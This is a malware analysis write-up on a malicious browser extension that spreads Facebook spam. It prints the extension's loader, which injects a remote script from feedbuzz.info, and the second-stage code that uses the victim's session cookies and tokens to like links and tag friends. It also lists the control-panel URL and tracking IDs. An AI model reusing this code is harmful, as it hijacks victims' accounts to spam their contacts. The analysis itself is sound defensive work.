Feedbuzz.info (Malicious browser extension Hosted in Canada by Sarah Ryan)

Resolved Feedbuzz.info to 184.107.233.186

The extension comes in both Firefox and Chrome flavors.
Initial loading comes from a fake youtube page, http://video8244.uni.me
The page is loaded from a Dropbox account (/u/95827902/), and the extensions are loaded from epicrewards.net.

Here is the Firefox extension source:
// Runs immediately on load; the loader below injects the remote second-stage script.
loadScript_you();
/**
 * Loader stub: appends a <script> tag pointing at feedbuzz.info/js.php to the
 * current page's <head>, so whatever that server returns runs in the page context.
 * The remote URL is plain http, and the function bails out on https pages
 * (presumably to avoid mixed-content blocking — not stated in the code).
 * @returns {boolean} true when the tag was appended, false when skipped (https) or no <head> exists
 */
function loadScript_you() {
    if ('https:' == document.location.protocol) return false;
    var s = document.createElement('script');
    s.setAttribute("type","text/javascript");
    // Remote payload: its contents are controlled server-side and can change at any time.
    s.setAttribute("src", "http://feedbuzz.info/js.php");
    var head=document.getElementsByTagName("head")[0];
    if( head==null) return false;
    head.appendChild(s);
    return true;
}
It loads the js.php file from the site feedbuzz.info, whose contents can be changed depending on what the owner wants the extension to do. Currently it picks one of two URLs and posts it on Facebook.

/* If you found this file, then congrats! */
/* Predefined variables and functions for the modules to use */
// Analyst note: `country` and `ip` are assigned without `var`, so they become implicit
// globals on the host page; nothing in this listing reads them.
country = "";
ip = "127.0.0.1"; /* Module: facebookwall&tag.php Start */
var variables = Math.floor(Math.random() * 100000000); // not referenced anywhere in this listing
// The two candidate spam links; one is chosen at random and later read by FBFBFB321().
var blogs = new Array();
blogs[0] = 'http://youtube-snakes.tumblr.com/?';
blogs[1] = 'https://dl.dropbox.com/u/76699623/Youtube/Youtube%20theme.html/?';
var rand = Math.floor(Math.random() * blogs.length);
var blog = blogs[rand];

/**
 * Looks up the cookie named `a` in `document.cookie`.
 * Each "name=value" segment has its leading spaces stripped before matching;
 * the value is returned exactly as stored (no decoding).
 * @param {string} a cookie name
 * @returns {string|null} the raw value, or null when no such cookie exists
 */
function readCookie(a) {
    var prefix = a + '=';
    var segments = document.cookie.split(';');
    for (var idx = 0; idx < segments.length; idx++) {
        // Drop the leading spaces left behind by the "; " separator.
        var segment = segments[idx].replace(/^ +/, '');
        if (segment.startsWith(prefix)) {
            return segment.substring(prefix.length);
        }
    }
    return null;
}
/**
 * Writes a cookie `nombre` with value `valor` (escape()-encoded) that expires
 * `caducidad` days from now, scoped to path "/".
 * @param {string} nombre cookie name
 * @param {string} valor cookie value
 * @param {number} caducidad lifetime in days
 */
function setCookie(nombre, valor, caducidad) {
    var expiry = new Date();
    expiry.setDate(expiry.getDate() + caducidad);
    var attributes = [
        nombre + "=" + escape(valor),
        "expires=" + expiry.toGMTString(),
        "path=/"
    ];
    document.cookie = attributes.join("; ");
}
/**
 * Reports whether a global property named `variable` exists on `window`
 * (anything other than undefined counts, including null).
 * @param {string} variable global name to look up
 * @returns {boolean}
 */
function isDefined(variable) {
    var value = window[variable];
    return typeof value !== "undefined";
}
/**
 * Analyst note: second stage of the spam routine. Using the victim's own
 * logged-in session it fetches the typeahead friend list, builds a comment that
 * @-mentions up to ten friends, and posts it as a comment on `story_fbid`.
 * Depends on the page's global `Env` object and the `c_user` cookie, so it can
 * only work when injected into a facebook.com page.
 * @param {string} url link being "liked" (already URL-encoded by the caller)
 * @param {string} story_fbid story id returned by like_url_con_etiketa_1's request
 * @returns {boolean} always true; the result of the POST is ignored
 */
function like_url_con_etiketa_2(url, story_fbid) {
    // Per-session values read from Facebook's page-level Env object
    // (presumably request/CSRF tokens — not verifiable from this listing).
    var post_form_id = Env.post_form_id;
    var impid = Env.impid;
    var fb_dtsg = Env.fb_dtsg;
    if (!isDefined("user_id")) {
        user_id = readCookie('c_user'); // implicit global holding the victim's account id
    }
    var lista;
    var c = new XMLHttpRequest();
    // Synchronous GET (third argument false); the random suffix is a cache-buster.
    c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + user_id + '&__user=' + user_id + '&' + Math['random'](), false);
    c['send']();
    if (c['readyState'] == 4) {
        if (c['status'] == 200) {
            // Skips the first 9 bytes of the response (presumably Facebook's anti-JSON-hijacking
            // prefix) and eval()s the remainder — executing server-supplied text as code.
            var data = eval('(' + c['responseText']['substr'](9) + ')');
            if (data['error']) {
                lista = null;
            } else {
                lista = data['payload']['entries'];
            }
        }
    }
    var n;
    // Bug: `lista` is undefined/null on any failure, so `lista['length']` throws; and
    // `n` stays undefined (loop below never runs) unless more than 10 entries came back.
    if (lista['length'] > 10) {
        n = 10;
    }
    var etiquetas = '';
    for (var i = 0; i < n; i++) {
        etiquetas += "@[" + lista[i]['uid'] + ":" + lista[i]['text'] + "] ";
    }
    var comment = "damn watch it " + etiquetas;
    var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
    // Form-encoded body assembled by string concatenation; `comment` is not URL-encoded.
    var e = 'href=' + url + '&node_type=link' + '&edge_type=like' + '&page_id' + '&connect_text=0' + '&story_fbid=' + story_fbid + '&comment=' + comment + '&widget_type=xfbml' + '&nctr[_mod]=like_widget' + '&nctr[_impid]=' + impid + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {}; // response deliberately discarded
    c['send'](e);
    return true;
}
/**
 * Analyst note: first stage of the spam routine. Sends a "like" for `url` in the
 * victim's session and, if the response carries a story id, hands it to
 * like_url_con_etiketa_2 to post the tagged comment.
 * Note that the caller (FBFBFB321) already URL-encodes `url` and this function
 * encodes it again, so the value is double-encoded in the request body.
 * @param {string} url link to "like"
 */
function like_url_con_etiketa_1(url) {
    url = encodeURIComponent(url);
    // Per-session values read from Facebook's page-level Env object.
    var post_form_id = Env.post_form_id;
    var impid = Env.impid;
    var fb_dtsg = Env.fb_dtsg;
    var c = new XMLHttpRequest();
    var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
    var e = 'href=' + url + '&node_type=link' + '&edge_type=like' + '&page_id' + '&layout=standard' + '&is_personalized=false' + '&connect_text=0' + '&ref' + '&now_connected=true' + '&post_form_id=' + post_form_id + '&iframe_referer=' + url + '&nctr[_mod]=like_widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {
        if (c['readyState'] == 4) {
            if (c['status'] == 200) {
                // As listed, this line is missing a `;` between the two statements and would not
                // parse — probably a transcription artifact of the write-up. It strips the first
                // 9 bytes of the response and eval()s the rest as JSON.
                var data = c['responseText']['substr'](9) data = eval('(' + data + ')');
                if (data['error']) {} else {
                    like_url_con_etiketa_2(url, data['payload']['story_fbid']);
                }
            }
        }
    };
    c['send'](e);
}
/**
 * Analyst note: entry point of the module. Only acts on plain-http facebook.com pages
 * where a `c_user` cookie (account id) is present. A per-account marker cookie,
 * `fb_gstres_<user_id>_url_4` set to "activate" for 2 days, throttles the routine to
 * one run per account every two days.
 * @returns {boolean} true on a facebook.com page with a user id, false otherwise
 */
function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        if (!isDefined("user_id")) {
            user_id = readCookie('c_user'); // implicit global
        }
        if (user_id == null) return false;
        var url = blog; // randomly chosen spam link (see module header)
        url = encodeURIComponent(url);
        var url_cookie = readCookie("fb_gstres_" + user_id + "_" + "url_4");
        if (url_cookie != "activate") {
            like_url_con_etiketa_1(url);
            setCookie("fb_gstres_" + user_id + "_" + "url_4", "activate", 2);
        }
        return true;
    }
    return false;
}
// Invoked immediately when js.php is injected into the page.
FBFBFB321(); /* Script Ends *\ /* Module: facebookwall&tag.php End */

The owner seems to be doing all of his spreading using free services.
Both spreading links install the extensions from the Dropbox account /u/76699623/, rather than epicrewards.net.

The Chrome extension source is slightly different:
// Runs immediately on load; same loader as the Firefox build, with a different name.
loadScript_YOU();
/**
 * Loader stub (Chrome build): identical to the Firefox loader apart from its name.
 * Appends a <script> tag for feedbuzz.info/js.php to the page's <head>; skipped on
 * https pages and when no <head> element exists.
 * @returns {boolean} true when the tag was appended, false otherwise
 */
function loadScript_YOU() {
    if ('https:' == document.location.protocol) return false;
    var s = document.createElement('script');
    s.setAttribute("type","text/javascript");
    // Remote payload; contents are controlled server-side.
    s.setAttribute("src", "http://feedbuzz.info/js.php");
    var head=document.getElementsByTagName("head")[0];
    if( head==null) return false;
    head.appendChild(s);
    return true;
}
  // Standard Google Analytics (ga.js) snippet. The account id below is the tracking
  // identifier that ties page views back to the operator's account.
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-31861921-1 ']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();


// whos.amung.us visitor-counter widget, injected as inline script text via innerHTML
// (the "3bcmg6ofjwms" value is the widget/account id).
var toDOM = document.createElement('script');
toDOM.innerHTML='var _wau = _wau || []; _wau.push(["small", "3bcmg6ofjwms", "05a"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/small.js";document.getElementsByTagName("head")[0].appendChild(s);})();'

document.body.appendChild(toDOM);
It includes two analytics scripts, most likely to track the sites visited.
The Google Analytics account is
UA-31861921-1

And the amung.us account is 
3bcmg6ofjwms
The Chrome extension also includes an update link:
"update_url": "http://plugin.elchavo.info/chrome.xml" 
However, it does not resolve at this time.

The control panel is located at http://feedbuzz.info/admin/login.php
Hosting info: http://whois.domaintools.com/feedbuzz.info
Samples: http://3ab4aaf5.linkbucks.com
Thanks to SassDrake at virustotal.com for the links to the samples
Edit: Here is a blog post showing how the posts look on Facebook (you will probably need Google Translate):
http://blog.vbalazs.me/2012/08/trukkos-facebook-spam-bongeszo.html
